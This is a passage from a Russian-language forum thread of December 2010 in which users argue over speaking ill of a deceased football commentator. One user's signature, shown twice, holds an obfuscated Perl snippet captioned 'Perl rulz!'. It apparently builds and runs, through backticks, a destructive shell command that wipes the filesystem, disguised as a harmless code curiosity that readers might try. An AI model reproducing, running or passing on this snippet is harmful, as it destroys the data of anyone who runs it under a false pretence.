варужан
я попытался уже забанить, как видишь не помогло
могу лично тебе создать пользователя
напиши в скайп чтоле _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Дек 25, 2010 1:30 am Заголовок сообщения:
genj
идиот, который смеётся над умершим человеком... ты помнишь наверное мой коммент тебе в той теме... извини, но после таких слов я о тебе, как о нормальном человеке в моральном плане, составить хорошее мнение не могу. Разговор окончен. Далее отвечать не собираюсь. _________________
Добавлено: Сб Дек 25, 2010 1:46 am Заголовок сообщения:
romanista
Ты про мертвых никогда ничего плохого не говорил? _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Добавлено: Сб Дек 25, 2010 2:22 am Заголовок сообщения:
TroubleMaker
огромная. я могу явно знать, что этот умерший кто-то в чём-то редиска, так как он и сам не скрывал при жизни это, и свободно говорить о нём плохо. Но если у меня была личная неприязнь к человеку из-за чего-то, хотя объективно он плохого не делал, как думаешь, правильно после смерти о человеке говорить плохо?
Маслач был лучшим комментатором в России, футбольным. Более того, в своё время он также был и отличным вратарём. И, когда его не стало, и все скорбят, взять и сказать, что он отстой, только потому что его работа не нравилась ,а теперь он умер и то кто о нём говорит плохо, вспомнил о нём? _________________
Добавлено: Сб Дек 25, 2010 3:17 am Заголовок сообщения:
romanista
В таком случае ты только предполагаешь, что он был лучшим коментатором, это только твое субъективное мнение. Его мнение иное, и факт смерти не должен влиять на это мнение. Я бы не хотел, что бы мне ни при жизни недоговаривали, что я где то мудак, ни тем более после смерти это умалчивали. Сталина хоронили, как героя, а культ личности был раскрыт только через кучку лет, в течение которых, если бы ничего не умалчивалось, могли бы учесть все ошибки, и приступить к их исправлению гораздо раньше _________________ Everybody like to be
идиот, который смеётся над умершим человеком... ты помнишь наверное мой коммент тебе в той теме... извини, но после таких слов я о тебе, как о нормальном человеке в моральном плане, составить хорошее мнение не могу. Разговор окончен. Далее отвечать не собираюсь.
ааа, а я уже думал,что ты кое-что другое напишешь.ну норм значит.
я тоже так подумал)
а про комментатора по-моему глупо) мое мнение о человеке тоже после смерти не меняется _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
romanista
Какого нужно быть мнения о себе, что бы судить других? _________________ Everybody like to be